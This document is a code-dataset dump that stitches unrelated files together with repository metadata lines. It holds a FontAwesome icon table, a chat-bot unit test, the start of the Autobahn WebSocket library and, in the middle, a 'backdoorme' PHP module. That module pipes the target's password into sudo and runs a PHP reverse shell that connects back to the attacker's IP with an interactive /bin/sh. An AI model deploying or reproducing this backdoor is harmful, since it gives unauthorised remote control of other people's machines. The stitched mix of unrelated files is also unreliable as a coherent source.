("fa-file-text-o", 0xf0f6),
("fa-file-video-o", 0xf1c8),
("fa-file-word-o", 0xf1c2),
("fa-file-zip-o", 0xf1c6),
("fa-files-o", 0xf0c5),
("fa-film", 0xf008),
("fa-filter", 0xf0b0),
("fa-fire", 0xf06d),
("fa-fire-extinguisher", 0xf134),
("fa-flag", 0xf024),
("fa-flag-checkered", 0xf11e),
("fa-flag-o", 0xf11d),
("fa-flash", 0xf0e7),
("fa-flask", 0xf0c3),
("fa-flickr", 0xf16e),
("fa-floppy-o", 0xf0c7),
("fa-folder", 0xf07b),
("fa-folder-o", 0xf114),
("fa-folder-open", 0xf07c),
("fa-folder-open-o", 0xf115),
("fa-font", 0xf031),
("fa-forward", 0xf04e),
("fa-foursquare", 0xf180),
("fa-frown-o", 0xf119),
("fa-gamepad", 0xf11b),
("fa-gavel", 0xf0e3),
("fa-gbp", 0xf154),
("fa-ge", 0xf1d1),
("fa-gear", 0xf013),
("fa-gears", 0xf085),
("fa-gift", 0xf06b),
("fa-git", 0xf1d3),
("fa-git-square", 0xf1d2),
("fa-github", 0xf09b),
("fa-github-alt", 0xf113),
("fa-github-square", 0xf092),
("fa-gittip", 0xf184),
("fa-glass", 0xf000),
("fa-globe", 0xf0ac),
("fa-google", 0xf1a0),
("fa-google-plus", 0xf0d5),
("fa-google-plus-square", 0xf0d4),
("fa-graduation-cap", 0xf19d),
("fa-group", 0xf0c0),
("fa-h-square", 0xf0fd),
("fa-hacker-news", 0xf1d4),
("fa-hand-o-down", 0xf0a7),
("fa-hand-o-left", 0xf0a5),
("fa-hand-o-right", 0xf0a4),
("fa-hand-o-up", 0xf0a6),
("fa-hdd-o", 0xf0a0),
("fa-header", 0xf1dc),
("fa-headphones", 0xf025),
("fa-heart", 0xf004),
("fa-heart-o", 0xf08a),
("fa-history", 0xf1da),
("fa-home", 0xf015),
("fa-hospital-o", 0xf0f8),
("fa-html5", 0xf13b),
("fa-image", 0xf03e),
("fa-inbox", 0xf01c),
("fa-indent", 0xf03c),
("fa-info", 0xf129),
("fa-info-circle", 0xf05a),
("fa-inr", 0xf156),
("fa-instagram", 0xf16d),
("fa-institution", 0xf19c),
("fa-italic", 0xf033),
("fa-joomla", 0xf1aa),
("fa-jpy", 0xf157),
("fa-jsfiddle", 0xf1cc),
("fa-key", 0xf084),
("fa-keyboard-o", 0xf11c),
("fa-krw", 0xf159),
("fa-language", 0xf1ab),
("fa-laptop", 0xf109),
("fa-leaf", 0xf06c),
("fa-legal", 0xf0e3),
("fa-lemon-o", 0xf094),
("fa-level-down", 0xf149),
("fa-level-up", 0xf148),
("fa-life-bouy", 0xf1cd),
("fa-life-ring", 0xf1cd),
("fa-life-saver", 0xf1cd),
("fa-lightbulb-o", 0xf0eb),
("fa-link", 0xf0c1),
("fa-linkedin", 0xf0e1),
("fa-linkedin-square", 0xf08c),
("fa-linux", 0xf17c),
("fa-list", 0xf03a),
("fa-list-alt", 0xf022),
("fa-list-ol", 0xf0cb),
("fa-list-ul", 0xf0ca),
("fa-location-arrow", 0xf124),
("fa-lock", 0xf023),
("fa-long-arrow-down", 0xf175),
("fa-long-arrow-left", 0xf177),
("fa-long-arrow-right", 0xf178),
("fa-long-arrow-up", 0xf176),
("fa-magic", 0xf0d0),
("fa-magnet", 0xf076),
("fa-mail-forward", 0xf064),
("fa-mail-reply", 0xf112),
("fa-mail-reply-all", 0xf122),
("fa-male", 0xf183),
("fa-map-marker", 0xf041),
("fa-maxcdn", 0xf136),
("fa-medkit", 0xf0fa),
("fa-meh-o", 0xf11a),
("fa-microphone", 0xf130),
("fa-microphone-slash", 0xf131),
("fa-minus", 0xf068),
("fa-minus-circle", 0xf056),
("fa-minus-square", 0xf146),
("fa-minus-square-o", 0xf147),
("fa-mobile", 0xf10b),
("fa-mobile-phone", 0xf10b),
("fa-money", 0xf0d6),
("fa-moon-o", 0xf186),
("fa-mortar-board", 0xf19d),
("fa-music", 0xf001),
("fa-navicon", 0xf0c9),
("fa-openid", 0xf19b),
("fa-outdent", 0xf03b),
("fa-pagelines", 0xf18c),
("fa-paper-plane", 0xf1d8),
("fa-paper-plane-o", 0xf1d9),
("fa-paperclip", 0xf0c6),
("fa-paragraph", 0xf1dd),
("fa-paste", 0xf0ea),
("fa-pause", 0xf04c),
("fa-paw", 0xf1b0),
("fa-pencil", 0xf040),
("fa-pencil-square", 0xf14b),
("fa-pencil-square-o", 0xf044),
("fa-phone", 0xf095),
("fa-phone-square", 0xf098),
("fa-photo", 0xf03e),
("fa-picture-o", 0xf03e),
("fa-pied-piper", 0xf1a7),
("fa-pied-piper-alt", 0xf1a8),
("fa-pied-piper-square", 0xf1a7),
("fa-pinterest", 0xf0d2),
("fa-pinterest-square", 0xf0d3),
("fa-plane", 0xf072),
("fa-play", 0xf04b),
("fa-play-circle", 0xf144),
("fa-play-circle-o", 0xf01d),
("fa-plus", 0xf067),
("fa-plus-circle", 0xf055),
("fa-plus-square", 0xf0fe),
("fa-plus-square-o", 0xf196),
("fa-power-off", 0xf011),
("fa-print", 0xf02f),
("fa-puzzle-piece", 0xf12e),
("fa-qq", 0xf1d6),
("fa-qrcode", 0xf029),
("fa-question", 0xf128),
("fa-question-circle", 0xf059),
("fa-quote-left", 0xf10d),
("fa-quote-right", 0xf10e),
("fa-ra", 0xf1d0),
("fa-random", 0xf074),
("fa-rebel", 0xf1d0),
("fa-recycle", 0xf1b8),
("fa-reddit", 0xf1a1),
("fa-reddit-square", 0xf1a2),
("fa-refresh", 0xf021),
("fa-renren", 0xf18b),
("fa-reorder", 0xf0c9),
("fa-repeat", 0xf01e),
("fa-reply", 0xf112),
("fa-reply-all", 0xf122),
("fa-retweet", 0xf079),
("fa-rmb", 0xf157),
("fa-road", 0xf018),
("fa-rocket", 0xf135),
("fa-rotate-left", 0xf0e2),
("fa-rotate-right", 0xf01e),
("fa-rouble", 0xf158),
("fa-rss", 0xf09e),
("fa-rss-square", 0xf143),
("fa-rub", 0xf158),
("fa-ruble", 0xf158),
("fa-rupee", 0xf156),
("fa-save", 0xf0c7),
("fa-scissors", 0xf0c4),
("fa-search", 0xf002),
("fa-search-minus", 0xf010),
("fa-search-plus", 0xf00e),
("fa-send", 0xf1d8),
("fa-send-o", 0xf1d9),
("fa-share", 0xf064),
("fa-share-alt", 0xf1e0),
("fa-share-alt-square", 0xf1e1),
("fa-share-square", 0xf14d),
("fa-share-square-o", 0xf045),
("fa-shield", 0xf132),
("fa-shopping-cart", 0xf07a),
("fa-sign-in", 0xf090),
("fa-sign-out", 0xf08b),
("fa-signal", 0xf012),
("fa-sitemap", 0xf0e8),
("fa-skype", 0xf17e),
("fa-slack", 0xf198),
("fa-sliders", 0xf1de),
("fa-smile-o", 0xf118),
("fa-sort", 0xf0dc),
("fa-sort-alpha-asc", 0xf15d),
("fa-sort-alpha-desc", 0xf15e),
("fa-sort-amount-asc", 0xf160),
("fa-sort-amount-desc", 0xf161),
("fa-sort-asc", 0xf0de),
("fa-sort-desc", 0xf0dd),
("fa-sort-down", 0xf0dd),
("fa-sort-numeric-asc", 0xf162),
("fa-sort-numeric-desc", 0xf163),
("fa-sort-up", 0xf0de),
("fa-soundcloud", 0xf1be),
("fa-space-shuttle", 0xf197),
("fa-spinner", 0xf110),
("fa-spoon", 0xf1b1),
("fa-spotify", 0xf1bc),
("fa-square", 0xf0c8),
("fa-square-o", 0xf096),
("fa-stack-exchange", 0xf18d),
("fa-stack-overflow", 0xf16c),
("fa-star", 0xf005),
("fa-star-half", 0xf089),
("fa-star-half-empty", 0xf123),
("fa-star-half-full", 0xf123),
("fa-star-half-o", 0xf123),
("fa-star-o", 0xf006),
("fa-steam", 0xf1b6),
("fa-steam-square", 0xf1b7),
("fa-step-backward", 0xf048),
("fa-step-forward", 0xf051),
("fa-stethoscope", 0xf0f1),
("fa-stop", 0xf04d),
("fa-strikethrough", 0xf0cc),
("fa-stumbleupon", 0xf1a4),
("fa-stumbleupon-circle", 0xf1a3),
("fa-subscript", 0xf12c),
("fa-suitcase", 0xf0f2),
("fa-sun-o", 0xf185),
("fa-superscript", 0xf12b),
("fa-support", 0xf1cd),
("fa-table", 0xf0ce),
("fa-tablet", 0xf10a),
("fa-tachometer", 0xf0e4),
("fa-tag", 0xf02b),
("fa-tags", 0xf02c),
("fa-tasks", 0xf0ae),
("fa-taxi", 0xf1ba),
("fa-tencent-weibo", 0xf1d5),
("fa-terminal", 0xf120),
("fa-text-height", 0xf034),
("fa-text-width", 0xf035),
("fa-th", 0xf00a),
("fa-th-large", 0xf009),
("fa-th-list", 0xf00b),
("fa-thumb-tack", 0xf08d),
("fa-thumbs-down", 0xf165),
("fa-thumbs-o-down", 0xf088),
("fa-thumbs-o-up", 0xf087),
("fa-thumbs-up", 0xf164),
("fa-ticket", 0xf145),
("fa-times", 0xf00d),
("fa-times-circle", 0xf057),
("fa-times-circle-o", 0xf05c),
("fa-tint", 0xf043),
("fa-toggle-down", 0xf150),
("fa-toggle-left", 0xf191),
("fa-toggle-right", 0xf152),
("fa-toggle-up", 0xf151),
("fa-trash-o", 0xf014),
("fa-tree", 0xf1bb),
("fa-trello", 0xf181),
("fa-trophy", 0xf091),
("fa-truck", 0xf0d1),
("fa-try", 0xf195),
("fa-tumblr", 0xf173),
("fa-tumblr-square", 0xf174),
("fa-turkish-lira", 0xf195),
("fa-twitter", 0xf099),
("fa-twitter-square", 0xf081),
("fa-umbrella", 0xf0e9),
("fa-underline", 0xf0cd),
("fa-undo", 0xf0e2),
("fa-university", 0xf19c),
("fa-unlink", 0xf127),
("fa-unlock", 0xf09c),
("fa-unlock-alt", 0xf13e),
("fa-unsorted", 0xf0dc),
("fa-upload", 0xf093),
("fa-usd", 0xf155),
("fa-user", 0xf007),
("fa-user-md", 0xf0f0),
("fa-users", 0xf0c0),
("fa-video-camera", 0xf03d),
("fa-vimeo-square", 0xf194),
("fa-vine", 0xf1ca),
("fa-vk", 0xf189),
("fa-volume-down", 0xf027),
("fa-volume-off", 0xf026),
("fa-volume-up", 0xf028),
("fa-warning", 0xf071),
("fa-wechat", 0xf1d7),
("fa-weibo", 0xf18a),
("fa-weixin", 0xf1d7),
("fa-wheelchair", 0xf193),
("fa-windows", 0xf17a),
("fa-won", 0xf159),
("fa-wordpress", 0xf19a),
("fa-wrench", 0xf0ad),
("fa-xing", 0xf168),
("fa-xing-square", 0xf169),
("fa-yahoo", 0xf19e),
("fa-yen", 0xf157),
("fa-youtube", 0xf167),
("fa-youtube-play", 0xf16a),
("fa-youtube-square", 0xf166) ]
FontAwesome = dict(( (code[0], unichr(code[1])) for code in _codepoints ))
|
mit
| -1,730,761,943,699,872,300
| 28.781676
| 88
| 0.544508
| false
| 2.376789
| false
| false
| false
|
Kkevsterrr/backdoorme
|
backdoors/shell/php.py
|
1
|
1529
|
from backdoors.backdoor import *
class Php(Backdoor):
prompt = Fore.RED + "(php) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using php module..."
self.core = core
self.options = {
"port" : Option("port", 53930, "port to connect to", True),
}
self.allow_modules = True
self.modules = {}
self.help_text = INFO + "Creates and runs a php backdoor which sends output to bash.\n"+INFO+"It does not automatically install a web server, but instead uses the php web module."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S php -r '$sock=fsockopen(\"" + self.core.localIP + "\"," + str(self.get_value("port")) + ");exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
def do_exploit(self, args):
port = self.get_value("port")
target = self.core.curtarget
#input("Please enter the following command: nc -v -n -l -p %s in another shell to connect." % port)
self.listen("none", "none")
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command(self.get_command())
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit(self.get_command())
# for mod in self.portModules.keys():
# print(INFO + "Attempting to execute " + mod.name + " module...")
# mod.exploit(self.get_port())
|
mit
| 8,837,472,853,760,200,000
| 45.333333
| 192
| 0.568999
| false
| 3.46712
| false
| false
| false
|
MeGotsThis/BotGotsThis
|
pkg/custom_command/tests/test_custom_query.py
|
1
|
1560
|
from lib.data.message import Message
from tests.unittest.base_custom import TestCustomField
# Needs to be imported last
from ..custom import query
class TestCustomCommandCustomQuery(TestCustomField):
def setUp(self):
super().setUp()
self.args = self.args._replace(field='query', message=Message('a b c'))
async def test(self):
self.args = self.args._replace(field='')
self.assertIsNone(await query.fieldQuery(self.args))
async def test_query(self):
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_caps(self):
self.args = self.args._replace(field='QUERY')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_default(self):
self.args = self.args._replace(message=Message(''),
prefix='[', suffix=']')
self.assertEqual(await query.fieldQuery(self.args), '')
async def test_prefix(self):
self.args = self.args._replace(prefix='[')
self.assertEqual(await query.fieldQuery(self.args), '[b c')
async def test_prefix_blank(self):
self.args = self.args._replace(prefix='')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
async def test_suffix(self):
self.args = self.args._replace(suffix=']')
self.assertEqual(await query.fieldQuery(self.args), 'b c]')
async def test_suffix_blank(self):
self.args = self.args._replace(suffix='')
self.assertEqual(await query.fieldQuery(self.args), 'b c')
|
gpl-3.0
| 4,702,043,906,517,372,000
| 35.27907
| 79
| 0.642308
| false
| 3.823529
| true
| false
| false
|
bzero/bitex
|
libs/autobahn/websocket.py
|
1
|
156783
|
###############################################################################
##
## Copyright 2011-2013 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
__all__ = ["createWsUrl",
"parseWsUrl",
"connectWS",
"listenWS",
"HttpException",
"ConnectionRequest",
"ConnectionResponse",
"Timings",
"WebSocketProtocol",
"WebSocketFactory",
"WebSocketServerProtocol",
"WebSocketServerFactory",
"WebSocketClientProtocol",
"WebSocketClientFactory"]
## The Python urlparse module currently does not contain the ws/wss
## schemes, so we add those dynamically (which is a hack of course).
##
import urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
import urllib
import binascii
import hashlib
import base64
import struct
import random
import os
from pprint import pformat
from array import array
from collections import deque
from twisted.internet import reactor, protocol
from twisted.python import log
from _version import __version__
from utf8validator import Utf8Validator
from xormasker import XorMaskerNull, createXorMasker
from httpstatus import *
from util import Stopwatch
def createWsUrl(hostname, port = None, isSecure = False, path = None, params = None):
"""
Create a WebSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSocket ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query component of the addressed resource (will be properly URL escaped).
:type params: dict
:returns: str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.urlencode(params)
else:
query = None
return urlparse.urlunparse((scheme, netloc, ppath, None, query, None))
def parseWsUrl(url):
"""
Parses as WebSocket URL into it's components and returns a tuple (isSecure, host, port, resource, path, params).
isSecure is a flag which is True for wss URLs.
host is the hostname or IP from the URL.
port is the port from the URL or standard port derived from scheme (ws = 80, wss = 443).
resource is the /resource name/ from the URL, the /path/ together with the (optional) /query/ component.
path is the /path/ component properly unescaped.
params is the /query) component properly unescaped and returned as dictionary.
:param url: A valid WebSocket URL, i.e. `ws://localhost:9000/myresource?param1=23¶m2=666`
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return (parsed.scheme == "wss", parsed.hostname, port, resource, path, params)
def connectWS(factory, contextFactory = None, timeout = 30, bindAddress = None):
"""
Establish WebSocket connection to a server. The connection parameters like target
host, port, resource and others are provided via the factory.
:param factory: The WebSocket protocol factory to be used for creating client protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketClientFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSocket connections ("wss").
:type contextFactory: A `twisted.internet.ssl.ClientContextFactory <http://twistedmatrix.com/documents/current/api/twisted.internet.ssl.ClientContextFactory.html>`_ instance.
:param timeout: Number of seconds to wait before assuming the connection has failed.
:type timeout: int
:param bindAddress: A (host, port) tuple of local address to bind to, or None.
:type bindAddress: tuple
:returns: obj -- An object which implements `twisted.interface.IConnector <http://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IConnector.html>`_.
"""
if factory.proxy is not None:
if factory.isSecure:
raise Exception("WSS over explicit proxies not implemented")
else:
conn = reactor.connectTCP(factory.proxy['host'], factory.proxy['port'], factory, timeout, bindAddress)
else:
if factory.isSecure:
if contextFactory is None:
# create default client SSL context factory when none given
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
conn = reactor.connectSSL(factory.host, factory.port, factory, contextFactory, timeout, bindAddress)
else:
conn = reactor.connectTCP(factory.host, factory.port, factory, timeout, bindAddress)
return conn
def listenWS(factory, contextFactory = None, backlog = 50, interface = ''):
"""
Listen for incoming WebSocket connections from clients. The connection parameters like
listening port and others are provided via the factory.
:param factory: The WebSocket protocol factory to be used for creating server protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketServerFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSocket connections ("wss").
:type contextFactory: A twisted.internet.ssl.ContextFactory.
:param backlog: Size of the listen queue.
:type backlog: int
:param interface: The interface (derived from hostname given) to bind to, defaults to '' (all).
:type interface: str
:returns: obj -- An object that implements `twisted.interface.IListeningPort <http://twistedmatrix.com/documents/current/api/twisted.internet.interfaces.IListeningPort.html>`_.
"""
if factory.isSecure:
if contextFactory is None:
raise Exception("Secure WebSocket listen requested, but no SSL context factory given")
listener = reactor.listenSSL(factory.port, factory, contextFactory, backlog, interface)
else:
listener = reactor.listenTCP(factory.port, factory, backlog, interface)
return listener
class FrameHeader:
"""
Thin-wrapper for storing WebSocket frame metadata.
FOR INTERNAL USE ONLY!
"""
def __init__(self, opcode, fin, rsv, length, mask):
"""
Constructor.
:param opcode: Frame opcode (0-15).
:type opcode: int
:param fin: Frame FIN flag.
:type fin: bool
:param rsv: Frame reserved flags (0-7).
:type rsv: int
:param length: Frame payload length.
:type length: int
:param mask: Frame mask (binary string) or None.
:type mask: str
"""
self.opcode = opcode
self.fin = fin
self.rsv = rsv
self.length = length
self.mask = mask
class HttpException:
"""
Throw an instance of this class to deny a WebSocket connection
during handshake in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
You can find definitions of HTTP status codes in module :mod:`autobahn.httpstatus`.
"""
def __init__(self, code, reason):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: str
"""
self.code = code
self.reason = reason
class ConnectionRequest:
"""
Thin-wrapper for WebSocket connection request information
provided in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect` when a WebSocket
client establishes a connection to a WebSocket server.
"""
def __init__(self, peer, peerstr, headers, host, path, params, version, origin, protocols, extensions):
"""
Constructor.
:param peer: IP address/port of the connecting client.
:type peer: object
:param peerstr: IP address/port of the connecting client as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `/myservice`.
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `{'foo': ['23', '66'], 'bar': ['2']}`.
:type params: dict of arrays of strings
:param version: The WebSocket protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSocket origin header or None. Note that this only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSocket (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: array of strings
:param extensions: The WebSocket extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
class ConnectionResponse():
"""
Thin-wrapper for WebSocket connection response information
provided in :meth:`autobahn.websocket.WebSocketClientProtocol.onConnect` when a WebSocket
client has established a connection to a WebSocket server.
"""
def __init__(self, peer, peerstr, headers, version, protocol, extensions):
"""
Constructor.
:param peer: IP address/port of the connected server.
:type peer: object
:param peerstr: IP address/port of the connected server as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSocket protocol version that is spoken.
:type version: int
:param protocol: The WebSocket (sub)protocol in use.
:type protocol: str
:param extensions: The WebSocket extensions in use.
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def parseHttpHeader(data):
"""
Parses the beginning of a HTTP request header (the data up to the \n\n line) into a pair
of status line and HTTP headers dictionary.
Header keys are normalized to all-lower-case.
FOR INTERNAL USE ONLY!
:param data: The HTTP header data up to the \n\n line.
:type data: str
:returns: tuple -- Tuple of HTTP status line, headers and headers count.
"""
raw = data.splitlines()
http_status_line = raw[0].strip()
http_headers = {}
http_headers_cnt = {}
for h in raw[1:]:
i = h.find(":")
if i > 0:
## HTTP header keys are case-insensitive
key = h[:i].strip().lower()
## not sure if UTF-8 is allowed for HTTP header values..
value = h[i+1:].strip().decode("utf-8")
## handle HTTP headers split across multiple lines
if http_headers.has_key(key):
http_headers[key] += ", %s" % value
http_headers_cnt[key] += 1
else:
http_headers[key] = value
http_headers_cnt[key] = 1
else:
# skip bad HTTP header
pass
return (http_status_line, http_headers, http_headers_cnt)
class Timings:
"""
Helper class to track timings by key. This class also supports item access,
iteration and conversion to string.
"""
def __init__(self):
self._stopwatch = Stopwatch()
self._timings = {}
def track(self, key):
"""
Track elapsed for key.
:param key: Key under which to track the timing.
:type key: str
"""
self._timings[key] = self._stopwatch.elapsed()
def diff(self, startKey, endKey, format = True):
"""
Get elapsed difference between two previously tracked keys.
:param startKey: First key for interval (older timestamp).
:type startKey: str
:param endKey: Second key for interval (younger timestamp).
:type endKey: str
:param format: If `True`, format computed time period and return string.
:type format: bool
:returns: float or str -- Computed time period in seconds (or formatted string).
"""
if self._timings.has_key(endKey) and self._timings.has_key(startKey):
d = self._timings[endKey] - self._timings[startKey]
if format:
if d < 0.00001: # 10us
s = "%d ns" % round(d * 1000000000.)
elif d < 0.01: # 10ms
s = "%d us" % round(d * 1000000.)
elif d < 10: # 10s
s = "%d ms" % round(d * 1000.)
else:
s = "%d s" % round(d)
return s.rjust(8)
else:
return d
else:
if format:
return "n.a.".rjust(8)
else:
return None
def __getitem__(self, key):
return self._timings.get(key, None)
def __iter__(self):
return self._timings.__iter__(self)
def __str__(self):
return pformat(self._timings)
class WebSocketProtocol(protocol.Protocol):
"""
A Twisted Protocol class for WebSocket. This class is used by both WebSocket
client and server protocol version. It is unusable standalone, for example
the WebSocket initial handshake is implemented in derived class differently
for clients and servers.
"""
SUPPORTED_SPEC_VERSIONS = [0, 10, 11, 12, 13, 14, 15, 16, 17, 18]
"""
WebSocket protocol spec (draft) versions supported by this implementation.
Use of version 18 indicates RFC6455. Use of versions < 18 indicate actual
draft spec versions (Hybi-Drafts). Use of version 0 indicates Hixie-76.
"""
SUPPORTED_PROTOCOL_VERSIONS = [0, 8, 13]
"""
WebSocket protocol versions supported by this implementation. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
draft version (0) in this case.
"""
SPEC_TO_PROTOCOL_VERSION = {0: 0, 10: 8, 11: 8, 12: 8, 13: 13, 14: 13, 15: 13, 16: 13, 17: 13, 18: 13}
"""
Mapping from protocol spec (draft) version to protocol version. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
pseudo protocol version 0 in this case.
"""
PROTOCOL_TO_SPEC_VERSION = {0: 0, 8: 12, 13: 18}
"""
Mapping from protocol version to the latest protocol spec (draft) version
using that protocol version. For Hixie-76, there is no protocol version
announced in HTTP header, and we just use the draft version (0) in this case.
"""
DEFAULT_SPEC_VERSION = 18
"""
Default WebSocket protocol spec version this implementation speaks: final RFC6455.
"""
DEFAULT_ALLOW_HIXIE76 = False
"""
By default, this implementation will not allow to speak the obsoleted
Hixie-76 protocol version. That protocol version has security issues, but
is still spoken by some clients. Enable at your own risk! Enabling can be
done by using setProtocolOptions() on the factories for clients and servers.
"""
_WS_MAGIC = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
"""
Protocol defined magic used during WebSocket handshake (used in Hybi-drafts
and final RFC6455.
"""
_QUEUED_WRITE_DELAY = 0.00001
"""
For synched/chopped writes, this is the reactor reentry delay in seconds.
"""
MESSAGE_TYPE_TEXT = 1
"""
WebSocket text message type (UTF-8 payload).
"""
MESSAGE_TYPE_BINARY = 2
"""
WebSocket binary message type (arbitrary binary payload).
"""
## WebSocket protocol state:
## (STATE_PROXY_CONNECTING) => STATE_CONNECTING => STATE_OPEN => STATE_CLOSING => STATE_CLOSED
##
STATE_CLOSED = 0
STATE_CONNECTING = 1
STATE_CLOSING = 2
STATE_OPEN = 3
STATE_PROXY_CONNECTING = 4
## Streaming Send State
SEND_STATE_GROUND = 0
SEND_STATE_MESSAGE_BEGIN = 1
SEND_STATE_INSIDE_MESSAGE = 2
SEND_STATE_INSIDE_MESSAGE_FRAME = 3
## WebSocket protocol close codes
##
CLOSE_STATUS_CODE_NORMAL = 1000
"""Normal close of connection."""
CLOSE_STATUS_CODE_GOING_AWAY = 1001
"""Going away."""
CLOSE_STATUS_CODE_PROTOCOL_ERROR = 1002
"""Protocol error."""
CLOSE_STATUS_CODE_UNSUPPORTED_DATA = 1003
"""Unsupported data."""
CLOSE_STATUS_CODE_RESERVED1 = 1004
"""RESERVED"""
CLOSE_STATUS_CODE_NULL = 1005 # MUST NOT be set in close frame!
"""No status received. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_ABNORMAL_CLOSE = 1006 # MUST NOT be set in close frame!
"""Abnormal close of connection. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_INVALID_PAYLOAD = 1007
"""Invalid frame payload data."""
CLOSE_STATUS_CODE_POLICY_VIOLATION = 1008
"""Policy violation."""
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG = 1009
"""Message too big."""
CLOSE_STATUS_CODE_MANDATORY_EXTENSION = 1010
"""Mandatory extension."""
CLOSE_STATUS_CODE_INTERNAL_ERROR = 1011
"""The peer encountered an unexpected condition or internal error."""
CLOSE_STATUS_CODE_TLS_HANDSHAKE_FAILED = 1015 # MUST NOT be set in close frame!
"""TLS handshake failed, i.e. server certificate could not be verified. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODES_ALLOWED = [CLOSE_STATUS_CODE_NORMAL,
CLOSE_STATUS_CODE_GOING_AWAY,
CLOSE_STATUS_CODE_PROTOCOL_ERROR,
CLOSE_STATUS_CODE_UNSUPPORTED_DATA,
CLOSE_STATUS_CODE_INVALID_PAYLOAD,
CLOSE_STATUS_CODE_POLICY_VIOLATION,
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG,
CLOSE_STATUS_CODE_MANDATORY_EXTENSION,
CLOSE_STATUS_CODE_INTERNAL_ERROR]
"""Status codes allowed to send in close."""
def onOpen(self):
"""
Callback when initial WebSocket handshake was completed. Now you may send messages.
Default implementation does nothing. Override in derived class.
Modes: Hybi, Hixie
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onOpen")
def onMessageBegin(self, opcode):
"""
Callback when receiving a new message has begun. Default implementation will
prepare to buffer message frames. Override in derived class.
Modes: Hybi, Hixie
:param opcode: Opcode of message.
:type opcode: int
"""
self.message_opcode = opcode
self.message_data = []
self.message_data_total_length = 0
def onMessageFrameBegin(self, length, reserved):
"""
Callback when receiving a new message frame has begun. Default implementation will
prepare to buffer message frame data. Override in derived class.
Modes: Hybi
:param length: Payload length of message frame which is to be received.
:type length: int
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
self.frame_length = length
self.frame_reserved = reserved
self.frame_data = []
self.message_data_total_length += length
if not self.failedByMe:
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
